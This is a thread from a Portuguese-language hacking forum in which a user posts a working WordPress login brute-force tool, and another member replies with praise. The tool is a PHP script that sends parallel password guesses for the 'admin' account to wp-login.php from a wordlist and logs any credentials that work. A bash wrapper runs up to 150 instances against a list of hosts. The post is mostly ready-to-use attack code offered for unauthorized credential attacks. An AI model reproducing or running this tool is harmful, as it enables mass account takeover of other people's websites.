[PHP+BASH] Wordpress brute force (Curl-multi)

n4sss

Elite Hacker

Registrado em: Aug 2010

Posts: 233
- Share
- Tweet
Font Size

#1

Tools [PHP+BASH] Wordpress brute force (Curl-multi)

31-08-2013, 17:22

Olá queridos!
Aqui mais um dos brutes para wordpress que escrevi nos momentos de "nada pra fazer!"

Temos 2 arquivos onde:

- wp-brute.php -> Brute em php em single mode
- wp-brute.sh -> Automatização em shell script para processos distintos juntamente com os threads de password utilizando curl multi ( multi request );

* User => Line 68;
* Wordlist => Line 69;
* Threads => Line 70;
* Log => Line 73;

Php code:

Código PHP:

<?php /* * Wordpress brute force by n4sss * php wp-brute.php host * * ( automate with shell script :D ) * sh wp-brute.sh host_file * * User => Line 68; * Wordlist => Line 69; * Threads => Line 70; * Log => Line 73; * * * * Greetx: Xcholler, Hackinho, Cooler_ & Friends. * * */ set_time_limit(0); error_reporting(0); function Save_buffer($content, $file){ $fp = fopen($file, "a"); fwrite($fp, $content."\r\n"); fclose($fp); } function Thread($host, $user, $wordlist, $threads, $log){ $time = time(); $multi = curl_multi_init(); $bolean = array_chunk($wordlist,$threads); $c = 1; @unlink("nx.cookie"); foreach($bolean as $password){ for($i=0;$i<=count($password)-1;$i++){ $ch[$i] = curl_init(); curl_setopt($ch[$i], CURLOPT_URL, $host.'/wp-login.php'); curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch[$i], CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"); curl_setopt($ch[$i], CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch[$i], CURLOPT_TIMEOUT, 10); curl_setopt($ch[$i], CURLOPT_COOKIEJAR, 'nx.cookie'); curl_setopt($ch[$i], CURLOPT_POST, TRUE); curl_setopt($ch[$i], CURLOPT_REFERER, $host . "wp-admin/"); curl_setopt($ch[$i], CURLOPT_POSTFIELDS, "log=".$user."&pwd=".$password[$i]."&wp-submit=Log%20In&redirect_to=".$host."/wp-admin/&testcookie=1"); curl_multi_add_handle($multi, $ch[$i]); }do{ curl_multi_exec($multi, $handl);usleep(1); } while($handl>0); foreach($ch as $ch_id => $output){ $result[$ch_id] = curl_multi_getcontent($output); curl_multi_remove_handle($multi, $output); print "[$c] Trying => $user:$password[$ch_id] \n"; if(preg_match("/general.php/si",$result[$ch_id])){ print "[+] Bruted\n"; print "$host => $user:$password[$ch_id]\n"; print "Saving to $log\n"; Save_buffer("$host => $user:$password[$ch_id]", $log); exit(0); } $c++; } } } if(!@$argv[1]){ exit("php $argv[0] host\n"); }else{ $host = trim("$argv[1]"); $user = "admin"; $wordlist = array_filter(array_unique(explode("\n", file_get_contents("wordlist.txt")))); $threads = "8"; $log = "wp_ok.txt"; Thread($host, $user, $wordlist, $threads, $log); } ?>

Bash code:

datainicial=`date +%s`
echo "Wp-BF by n4sss. Multithread on"
echo "Wait the brute in the background "

cat $1 | sort | uniq > mfu.txt
CONTOR=0
for i in `cat mfu.txt`
do
CONTOR=`ps aux | grep -c php`

while [ $CONTOR -ge 150 ];do
CONTOR=`ps aux | grep -c php`
echo "Sleeping"
sleep 5
done

if [ $CONTOR -le 150 ]; then
php wp-brute.php $i > /dev/null &
fi

done
datafinal=`date +%s`
soma=`expr $datafinal - $datainicial`
resultado=`expr 10800 + $soma`
tempo=`date -d @$resultado +%H:%M:%S`
echo " Tempo gasto: $tempo "

Youtube:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

Abraço a todos.

n4sss@m4g1cl4b~#$I
just this.
Tags: Nenhum(a)

Top
GabrielPBM

Membro

Registrado em: Aug 2013

Posts: 43
- Share
- Tweet
Font Size

#2

01-09-2013, 16:57

Ficou massa, congrats xD
Top
Comment

Unconfigured Ad Widget

Anúncio

[PHP+BASH] Wordpress brute force (Curl-multi)

Tools [PHP+BASH] Wordpress brute force (Curl-multi)

Comment